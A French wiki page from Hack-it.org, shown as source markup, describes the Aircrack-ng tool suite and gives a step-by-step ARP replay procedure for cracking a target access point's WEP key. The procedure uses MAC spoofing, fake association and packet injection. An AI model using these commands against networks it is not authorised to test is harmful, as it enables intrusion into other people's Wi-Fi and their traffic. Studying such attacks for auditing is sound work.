Pork Center
Voir le texte source
Page
Discussion
Voir le texte source
Historique
Rechercher
Navigation
Accueil
Communauté
Modifications récentes
Page au hasard
Chat
Aide
sitesupport
Outils personnels
18.222.97.149
Discussion avec cette adresse IP
Connexion
Boîte à outils
Pages liées
Suivi des pages liées
Pages spéciales
Voir le texte source
De Hack-it.org.
pour
Aircrack-ng
== Les outils de la suite aircrack == === aircrack-ng === Sert à casser la clé WEP, depuis la derniere version, il utilise l'algorythme PTW par défaut. === airbase-ng === Sert à simuler un point d'accès afin d'attaquer le client qui se connectera au "fake-ap". === airdecap-ng === Sert à déchiffrer un fichier pcap (.cap) à l'aide de la clé WEP/WPA si nécessaire, afin de pouvoir consulter les paquets à l'aide d'un logiciel tel que wireshark. === airdecloak-ng === Sert à décloaker (démasquer) les bssid cloakés === airdriver-ng === Sert à compiler, dés/installer les drivers appropriés à votre carte. === aireplay-ng === Sert à injecter des paquets et à s'authentifier auprès des AP. === airmon-ng === Sert à dés/activer le mode monitor sur votre carte. === airodump-ng === Sert à rechercher des AP cibles et de voir les stations associées aux AP. Permet également de capturer les paquets lors de l'attaque. === airserv-ng === Serveur pour carte WiFi. Permet à plusieurs applications sans fil d'utiliser indépendament la carte via une connection TCP de type client-serveur. === airolib-ng === Permet de créer une base de données sqlite en vue d'un crack WPA. <br />ATTENTION: Pour fonctionner, vous devez avoir compilé aircrack avec le support pour sqlite. === airtun-ng === === buddy-ng === A utiliser avec easside-ng === easside-ng === Outil "auto-magic" permettant de communiquer avec un AP utilisant le chiffrement WEP sans en connaitre la clé. === ivstools === Permet d'extraire les IVs d'un fichier pcap, ou bien de rassembler plusieurs fichiers .ivs en un seul. === makeivs === Permet de créer un fichier .ivs à partir d'une clé WEP connue. === packetforge-ng === Sert à forger des paquets de différents types (le plus souvent un ARP en vue d'une injection). === tkiptun-ng === Permet d'aider au crack de clés WPA utilisant TKIP. <br />ATTENTION: Cet outil n'est pas encore fonctionnel. === wesside-ng === Outil permettant l'automatisation du crack de clé WEP. == Les différents types d'attaques == TOUTES LES COMMANDES CI-DESSOUS SONT A EFFECTUER EN ROOT <br />Dans les cas ou l'association ne fonctionne pas, il faut couper la carte, changer l'adresse mac de la carte par celle d'un client connecté à la station avec une commande du type "macchanger --mac $mac $iface", et relancer la carte. === Légende === $iface : interface correspondant à la carte WiFi (wlan0, rausb0, mon0 ou autre) <br />$canal = canal wifi à utiliser (colonne "CH" dans airodump-ng) <br />$bssid_cible = BSSID du point d'acces ciblé <br />$essid_cible = ESSID du point d'acces ciblé (peut parfois etre masqué) <br />$mac_carte = adresse MAC de la carte wifi (peut etre la meme que celle d'un client connecté en cas de MAC spoofing) <br />$mac_client = adresse MAC du client associé au point d'acces ciblé (colonne "STATION" dans airodump-ng) === Mac spoofing === Pour les procédures ci-dessous, dans les cas ou l'association ne fonctionne pas, il faut couper la carte, changer l'adresse mac de la carte par celle d'un client connecté à la station avec une commande du type: <br />macchanger --mac $mac $iface <br />et relancer la carte. === Méthode "ARP replay" === * Mettre carte en monitor: >>> ifconfig $iface down <br />>>> airmon-ng start $iface * Trouver une victime: >>> airodump-ng $iface <br />Couper une fois la victime trouvée * Lancer la capture d'IVS: >>> airodump-ng -c $canal -w $fichier_capture $iface <br />-w = préfixe à utiliser pour le nom du fichier de capture <br />Laisser tourner... * Associer la carte à l'AP: >>> aireplay-ng -1 30 -e $essid_cible -a $bssid_cible -h $mac_client $iface <br />-1 = fake association <br />30 = temps d'attente entre 2 tentatives <br />En cas de succes, "Association successful :-)" doit s'afficher (si affiché sans le smiley, attendre) * Lancer l'injection: >>> aireplay-ng -3 -e $essid_cible -a $bssid_cible -h $mac_client $iface <br />-3 = attaque ARP replay <br />Surveiller la colonne #Data (correspond aux IVs) dans airodump, en cas de succès cette valeur augmente * Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés: >>> aircrack-ng $fichier_capture
Revenir à la page
Aircrack-ng
.